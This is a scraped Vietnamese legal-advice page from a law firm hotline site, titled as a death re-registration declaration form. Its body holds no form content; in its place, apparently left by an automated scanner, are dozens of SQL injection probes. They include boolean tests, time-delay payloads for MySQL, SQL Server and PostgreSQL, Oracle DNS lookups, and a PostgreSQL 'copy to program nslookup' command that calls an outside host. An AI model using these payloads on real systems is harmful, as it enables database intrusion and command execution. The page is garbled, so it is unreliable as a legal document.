Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai đăng kí lại việc tử

Cập nhật lần cuối lúc 14:07 ngày 16/07/2013

Nguồn: vinalaf.com.vn
1
1
1'"
1
\
1
-1 OR 2+891-891-1=0+0+0+1 --
1
-1 OR 3+891-891-1=0+0+0+1 --
@@XNDmQ
-1 OR 3*2<(0+5+891-891) --
JyI=
-1 OR 3*2>(0+5+891-891) --
-1 OR 2+356-356-1=0+0+0+1
-1 OR 3+356-356-1=0+0+0+1
-1 OR 3*2<(0+5+356-356)
-1 OR 3*2>(0+5+356-356)
-1' OR 2+48-48-1=0+0+0+1 --
-1' OR 3+48-48-1=0+0+0+1 --
-1' OR 3*2<(0+5+48-48) --
-1' OR 3*2>(0+5+48-48) --
-1' OR 2+813-813-1=0+0+0+1 or '6SizAIVs'='
-1' OR 3+813-813-1=0+0+0+1 or '6SizAIVs'='
-1' OR 3*2<(0+5+813-813) or '6SizAIVs'='
-1' OR 3*2>(0+5+813-813) or '6SizAIVs'='
-1" OR 2+203-203-1=0+0+0+1 --
-1" OR 3+203-203-1=0+0+0+1 --
-1" OR 3*2<(0+5+203-203) --
-1" OR 3*2>(0+5+203-203) --
if(now()=sysdate(),sleep(8.766),0)/*'XOR(if(now()=sysdate(),sleep(8.766),0))OR'"XOR(if(now()=sysdate(),sleep(8.766),0))OR"*/
(select(0)from(select(sleep(8.766)))v)/*'+(select(0)from(select(sleep(8.766)))v)+'"+(select(0)from(select(sleep(8.766)))v)+"*/
-1; waitfor delay '0:0:17.532' --
-1); waitfor delay '0:0:26.298000000000002' --
1 waitfor delay '0:0:17.532' --
0DzyDpnd'; waitfor delay '0:0:26.298000000000002' --
-1;select pg_sleep(8.766); --
-1);select pg_sleep(8.766); --
-1));select pg_sleep(8.766); --
zefzwZzx';select pg_sleep(8.766); --
nZzdDhgo');select pg_sleep(17.532); --
pvmGLF6j'));select pg_sleep(17.532); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6087.34060.ae22a.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6089.34060.ae22a.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6091.34060.ae22a.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6093.34060.ae22a.\1.bxss.me
827'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: